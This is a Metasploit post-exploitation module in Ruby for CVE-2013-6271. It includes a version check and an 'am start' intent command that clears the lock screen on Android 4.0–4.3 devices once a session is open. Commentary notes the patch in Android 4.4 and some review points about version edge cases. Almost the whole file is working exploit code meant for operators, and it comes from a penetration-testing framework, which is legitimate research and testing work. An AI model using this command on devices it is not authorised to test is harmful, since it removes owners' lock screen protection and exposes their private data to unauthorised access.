##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/android'
# Post module for CVE-2013-6271, the Android 4.0-4.3 Settings flaw described
# in the module metadata below. It needs an existing meterpreter or shell
# session on an Android device.
#
# Defensive context from the module's own description: the flaw is in
# com.android.settings.ChooseLockGeneric, any unprivileged app can trigger it,
# and it was patched in Android 4.4. Devices that cannot move to a patched
# release remain exposed to any installed app, not only to this module.
class Metasploit4 < Msf::Post
  Rank = NormalRanking

  include Msf::Post::Common
  include Msf::Post::Android::System

  # Builds the module metadata and hands it to the framework.
  #
  # @param info [Hash] caller-supplied metadata, merged through update_info
  def initialize(info={})
    module_info = {
      'Name' => "Android Settings Remove Device Locks (4.0-4.3)",
      'Description' => %q{
        This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.
        Any unprivileged app can exploit this vulnerability to remove the lockscreen.
        A logic flaw / design error exists in the settings application that allows an Intent from any
        application to clear the screen lock. The user may see that the Settings application has crashed,
        and the phone can then be unlocked by a swipe.
        This vulnerability was patched in Android 4.4.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'CureSec', # discovery
        'timwr' # metasploit module
      ],
      'References' =>
        [
          [ 'CVE', '2013-6271' ],
          [ 'URL', 'http://blog.curesec.com/article/blog/26.html' ],
          [ 'URL', 'http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf' ]
        ],
      'SessionTypes' => [ 'meterpreter', 'shell' ],
      'Platform' => 'android',
      'DisclosureDate' => "Oct 11 2013"
    }

    super(update_info(info, module_info))
  end

  # Reports whether the device's ro.build.version.release value lies in the
  # inclusive range 4.0..4.3.
  #
  # @return [Boolean] true when the reported release is within 4.0..4.3
  # @raise [RuntimeError] when get_build_prop returns an empty result
  def is_version_compat?
    props = get_build_prop

    # cmd_exec sometimes fails to cat build.prop, and #get_build_prop then
    # comes back empty. Fail loudly instead of comparing against nothing.
    raise RuntimeError, "Failed to retrieve build.prop, you might need to try again." if props.empty?

    release = Gem::Version.new(props['ro.build.version.release'])
    oldest_affected = Gem::Version.new('4.0')
    newest_affected = Gem::Version.new('4.3')

    # NOTE(review): Gem::Version orders a point release such as 4.3.1 above
    # 4.3, so it is reported as out of range here. Confirm this matches the
    # affected range, since the description places the fix in 4.4.
    # NOTE(review): a build.prop without ro.build.version.release passes nil
    # to Gem::Version.new; that case is not handled explicitly.
    release.between?(oldest_affected, newest_affected)
  end

  # Checks the version, then launches the ChooseLockGeneric activity through
  # `am start` and reports the result to the operator.
  #
  # Success is inferred only from the absence of "Error:" in the command
  # output. The lock state itself is never read back, so a "good" message
  # means the Intent was started, not that the lock was confirmed removed.
  def run
    unless is_version_compat?
      print_error("This module is only compatible with Android versions 4.0 to 4.3")
      return
    end

    intent_cmd = 'am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task'
    output = cmd_exec(intent_cmd)
    error_at = output =~ /Error:/

    if error_at.nil?
      print_good("Intent started, the lock screen should now be a dud.")
      print_good("Go ahead and manually swipe or provide any pin/password/pattern to continue.")
    else
      print_error("The Intent could not be started")
      vprint_status("Command output: #{output}")
    end
  end
end